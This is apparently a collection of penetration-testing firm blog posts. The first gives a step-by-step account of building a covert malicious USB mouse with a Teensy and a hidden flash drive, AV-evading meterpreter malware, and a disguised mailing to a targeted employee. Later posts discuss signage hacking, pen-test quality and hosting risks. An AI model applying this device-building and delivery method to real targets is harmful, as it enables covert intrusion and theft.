For the purposes of this engagement we chose to use a fancy Logitech USB mouse as our Hacker Interface Device / Attack Platform. To turn our Logitech Human Interface Device into a Hacker Interface Device, we had to make some modifications. The first step of course was to remove the screw from the bottom of the mouse and pop it open. Once we did that we disconnected the USB cable from the circuit board in the mouse and put that to the side. Then we proceeded to use a Dremel tool to shave away the extra plastic on the inside cover of the mouse. (There were all sorts of tabs that we could sacrifice.) The removal of the plastic tabs was to make room for the new hardware.

Once the top of the mouse was gutted and all the unnecessary parts removed we began to focus on the USB hub. The first thing we had to do was to extract the board from the hub. Doing that is a lot harder than it sounds because the hub that we chose was glued together and we didn’t want to risk breaking the internals by being too rough. After about 15 minutes of prying with a small screwdriver (and repeated accidental hand stabbing) we were able to pull the board out from the plastic housing. We then proceeded to strip the female USB connectors off of the board by heating their respective pins to melt the solder (being careful not to burn the board). Once those were extracted we were left with a naked USB hub circuit board that measured about half an inch long and was no wider than a small Bic lighter.

With the mouse and the USB board prepared we began the process of soldering. The first thing that we did was to take the mini USB cable and cut one of the ends off, leaving about 1 inch of wire near the connector. Then we stripped all plastic off of the connector and stripped a small amount of wire from the 4 internal wires. We soldered those four wires to the USB board making sure to follow the right pinout pattern. This is the cable that will plug into the Teensy’s mini USB port when we insert the Teensy microcontroller.

Once that was finished we took the USB cable that came with the mouse and cut the circuit board connector off of the end, leaving 2 inches of wire attached. We stripped the tips of the 4 wires still attached to the connector and soldered those to the USB hub making sure to follow the right pinout patterns mentioned above. This is an important cable as it’s the one that connects the USB hub to the mouse. If this cable is not soldered properly and the connections fail, then the mouse will not work. We then took the other piece of the mouse cable (the longer part) and soldered that to the USB board. This is the cable that will connect the mouse to the USB port on the computer.

At this point we have three cables soldered to the USB hub. Just to recap, those cables are the mouse connector cable, the cable that goes from the mouse to the computer, and the mini USB adapter cable for the Teensy device. The next and most challenging part of this is to solder the USB flash drive to the USB hub. This is important because the USB flash drive is where we store our malware. If the drive isn’t soldered on properly then we won’t be able to store our malware on the drive and the attack would be mostly moot. (We say mostly because we could still instruct the mouse to fetch the malware from a website, but that’s not covert.)

To solder the flash drive to the USB hub we cut about 2 inches of cable from the mini USB connector that we stole the end from previously. We stripped the ends of the wires in the cable and carefully soldered the ends to the correct points on the flash drive. Once that was done we soldered the other ends of the cable to the USB hub. At that point we had everything soldered together and had to fit it all back into the mouse. Assembly was pretty easy because we were careful to use as little material as possible while still giving us the flexibility that we needed. We wrapped the boards and wires in single layers of electrical tape to avoid any shorts. Once everything was back together we plugged in the mouse and tested the devices. The USB drive mounted, the Teensy card was programmable, and the mouse worked.

Time to give prion the ability to infect…

We learned that the client was using McAfee as their antivirus solution because one of their employees was complaining about it on Facebook. Remember, we weren’t allowed to use social networks for social engineering but we certainly were allowed to do reconnaissance against social networks. With McAfee in our sights we set out to create custom malware for the client (as we do for any client and their respective antivirus solution when needed). We wanted our malware to be able to connect back to Metasploit because we love the functionality, and we also wanted the capabilities provided by meterpreter, but we needed more than that. We needed our malware to be fully undetectable and to subvert the “Do you want to allow this connection” dialogue box entirely. You can’t do that with encoding…

Update: As of 06/29/2011 9AM EST: this variant of our pseudomalware is being detected by McAfee.

Update: As of 06/29/2011 10:47AM EST: we’ve created a new variant that seems to bypass any AV.

To make this happen we created a meterpreter C array with the windows/meterpreter/reverse_tcp_dns payload. We then took that C array, chopped it up and injected it into our own wrapper of sorts. The wrapper used an undocumented (0-day) technique to completely subvert the dialogue box and to evade detection by McAfee. When we ran our tests on a machine running McAfee, the malware ran without a hitch. We should point out that our ability to evade McAfee isn’t any indication of quality and that we can evade any antivirus solution using similar custom attack methodologies. After all, it’s impossible to detect something if you don’t know what it is that you are looking for. (It also helps to have a team of researchers at our disposal.)

Once we had our malware built we loaded it onto the flash drive that we soldered into our mouse. Then we wrote some code for the Teensy microcontroller to launch the malware 60 seconds after the start of user activity. Much of the code was taken from Adrian Crenshaw’s website, and he deserves credit for giving us this idea in the first place. After a little bit of debugging, our evil mouse named prion was working flawlessly.

Usage: Plug mouse into computer, get pwned.

The last and final step here was to ship the mouse to our customer. One of the most important aspects of this was to repack the mouse in its original package so that it appeared unopened. Then we used Jigsaw to purchase a list of our client’s employees. We did a bit of reconnaissance on each employee and found a target that looked ideal. We packaged the mouse to make it look like a promotional gadget, added fake marketing flyers, etc., then shipped the mouse. Sure enough, three days later the mouse called home.

 


Netragard Signage Snatching

Recently Netragard has had a few discussions with owners and operators of sports arenas, with the purpose of identifying methods by which a malicious hacker could potentially disrupt a sporting event, concert, or other large-scale and highly visible event.

During the course of these conversations, the topic of discussion shifted from network exploitation to social engineering, with a focus on compromise of the digital signage systems.  Until recently, even I hadn’t thought about how extensively network-controlled signage systems are used in facilities like casinos, sports arenas, airports, and roadside billboards.  That is, until our most recent casino project.

Netragard recently completed a Network Penetration Test and Social Engineering Test for a large west coast casino, with spectacular results. Not only were our engineers able to gain the keys to the kingdom, they were also able to gain access to the systems that had supervisory control for every single digital sign in the facility.  Some people may think to themselves, “ok, what’s the big deal with that?”  The answer is simple: customer perception and corporate image.

Before I continue on, let me provide some background. Early in 2008, there were two incidents in California where two on-highway digital billboards were compromised and their displays changed from the intended content.  While both of these incidents were small pranks in comparison to what they could have done, the effect was remembered by those who drove by and saw the signs.  (Example A, Example B)

Another recent billboard hack in Moscow, Russia, wasn’t as polite as the pranksters in California.  A hacker was able to gain control of a billboard in downtown Moscow (worth noting, Moscow is the 7th largest city in the world), and after subsequently gaining access, looped a video clip of pornographic material. (Example C) Imagine if this was a sports organization, and this happened during a major game.

Bringing this post back on track, let’s refocus on the casino and the potential impact of signage compromise.  After spending time in the signage control server, we determined that there were over 40 unique displays available to control, some of which were over 100″ in display size.  With customer permission, we placed a unique image on a small sign for proof of concept purposes (go google “stallowned”).  This test, coupled with an impact audit, clearly highlighted to the casino that ensuring the security of their signage systems was nearly as important as securing their security systems, cage systems, and domain controllers.  All the domain security in the world means little to a customer if they’re presented with disruptive material on the signage during their visit to the casino.  A compromise of this nature could cause a significant loss of revenue, and cause a customer to never revisit the casino.

I also thought it pertinent for the purpose of this post to share another customer engagement story.  This story highlights how physical security can be compromised by a combination of social engineering and network exploitation, thus opening an additional risk vector that could allow for compromise of the local network running the digital display systems.

Netragard was engaged by a large bio-sciences company in late 2010 to assess the network and physical security of multiple locations belonging to a business unit that was a new acquisition.  During the course of this engagement, Netragard was able to take complete control of their network infrastructure remotely, as is the case in most of our engagements.  What’s more, our engineers were able to utilize their social engineering skills to “convince” the physical site staff to grant them building access.  Once past this first layer of physical access, by combining social and network exploitation, they were subsequently able to gain access to sensitive labs and document storage rooms.  These facilities/rooms were key to the organization’s intellectual property and ongoing research.  Had our engineers been hired by a competing company or other entity, there would have been a 100% chance that the IP (research data, trials data, and so forth) could have been spirited off company property and into hands unknown.

By combining network exploitation and social engineering, we’ve postulated to the sports arena operators that Netragard has a high probability of gaining access to the control systems for their digital signage.  Inevitably, during these discussions the organizations push back, stating that their facilities have trained security staff and access control systems.  To that we inform them that the majority of sports facility staff are more attuned to illicit access attempts in controlled areas, but only during certain periods of operation, such as active games, concerts, and other large-scale events.  During non-public usage hours though, there’s a high probability that a skilled individual could gain entry to access-controlled areas during a private event, or through a breach of trust, such as posing as a repair technician, emergency services employee, or even a facility employee.

One area of concern for any organization, whether they be a football organization, Fortune 100 company, or a mid-size business, is a breach of trust with their consumer base.  For a major sports organization, the level of national exposure and endearment far exceeds the exposure most Netragard customers have to the public.  Because of this extremely high national exposure, a sports organization and its arena are a prime target for those who may consider highly visible public disruption of games a key tool in furthering a socio-political agenda.  We’re hopeful that these organizations will continue to take a more serious stance to ensure that their systems and public image are as protected as possible.

– Mike Lockhart, VP of Operations


Quality Penetration Testing by Netragard

The purpose of Penetration Testing is to identify the presence of points where an external entity can make its way into or through a protected entity. Penetration Testing is not unique to IT security and is used across a wide variety of different industries.  For example, Penetration Tests are used to assess the effectiveness of body armor.  This is done by exposing the armor to different munitions that represent the real threat. If a projectile penetrates the armor then the armor is revised and improved upon until it can endure the threat.

Network Penetration Testing is a class of Penetration Testing that applies to Information Technology. The purpose of Network Penetration Testing is to identify the presence of points where a threat (defined by the hacker) can align with existing risks to achieve penetration. The accurate identification of these points allows for remediation.

Successful penetration by a malicious hacker can result in the compromise of data with respect to Confidentiality, Integrity and Availability (“CIA”).  In order to ensure that a Network Penetration Test provides an accurate measure of risk (risk = probability x impact) the test must be delivered at a threat level that is slightly elevated from that which is likely to be faced in the real world. Testing at a lower than realistic threat level would be akin to testing a bulletproof vest with a squirt gun.

Threat levels can be adjusted by adding or removing attack classes. These attack classes are organized under three top-level categories, which are Network Attacks, Social Attacks, and Physical Attacks.  Each of the top-level categories can operate in a standalone configuration or can be used to augment the other.  For example, Network Penetration Testing with Social Engineering creates a significantly higher level of threat than just Network Penetration Testing or Social Engineering alone.  Each of the top-level threat categories contains numerous individual attacks.

A well-designed Network Penetration Testing engagement should employ the same attack classes as a real threat. This ensures that testing is realistic which helps to ensure effectiveness. All networked entities face threats that include Network and Social attack classes. Despite this fact, most Network Penetration Tests entirely overlook the Social attack class and thus test at radically reduced threat levels. Testing at reduced threat levels defeats the purpose of testing by failing to identify the same level of risks that would likely be identified by the real threat.  The level of threat that is produced by a Network Penetration Testing team is one of the primary measures of service quality.


Hosted Solutions: A Hacker’s Haven

Human beings are lazy by nature. If there is a choice to be made between a complicated technology solution and an easy technology solution, then nine times out of ten people will choose the easy solution. The problem is that the easy solutions are often riddled with hidden risks, and those risks can end up costing the consumer more money in damages than what might be saved by using the easy solution.

The advantages of using a managed hosting provider to host your email, website, telephone systems, etc., are clear. When you outsource critical infrastructure components you save money. The savings are quickly realized because you no longer need to spend money running a full-scale IT operation. In many cases, you don’t even need to worry about purchasing hardware, software, or even hiring IT staff to support the infrastructure.

What isn’t clear to most people is the serious risk that outsourcing can introduce to their business. In nearly all cases a business will have a radically lower risk and exposure profile if they keep everything in-house. This is true because of the substantial attack surface that hosting providers have when compared to in-house IT environments.

For example, a web-hosting provider might host 1,000 websites across 50 physical servers. If one of those websites contains a single vulnerability and that vulnerability is exploited by a hacker, then the hacker will likely take control of the entire server. At that point the hacker will have successfully compromised and taken control of every website hosted on that server (roughly 20 in this example) with a single attack.

In non-hosted environments there might be only one Internet-facing website as opposed to the 1000 that exist in a hosted environment. As such, the attack surface for this example would be 1000 times greater in a hosted environment than it is in a non-hosted environment. In a hosted environment the risks that other customers introduce to the infrastructure also become your risk. In a non-hosted environment you are only impacted by your own risks.
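To put rough numbers on that, here is the back-of-the-envelope math for the example above (purely illustrative):

    hosted_sites = 1000
    hosted_servers = 50
    sites_per_server = hosted_sites // hosted_servers   # roughly 20 sites share each server

    # One exploited site on a shared server exposes every co-hosted site on it,
    # and any of the 1,000 sites can be the initial point of entry.
    print(f"Compromising one shared server exposes roughly {sites_per_server} websites")
    print(f"Number of sites whose flaws can become your problem: {hosted_sites}")

In an in-house environment there is one Internet-facing site on one server, and only your own flaws count against you.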

To make matters worse, many people assume that such a risk isn’t significant because they do not use their hosted systems for any critical transactions. They fail to consider the fact that the hacker can modify the contents of the compromised system. These modifications can involve redirecting online banking portal links, redirecting credit card form posting links, or even spreading infectious malware. While this is true for any compromised system, the chances of suffering a compromise in a hosted environment are much greater than in a non-hosted environment.
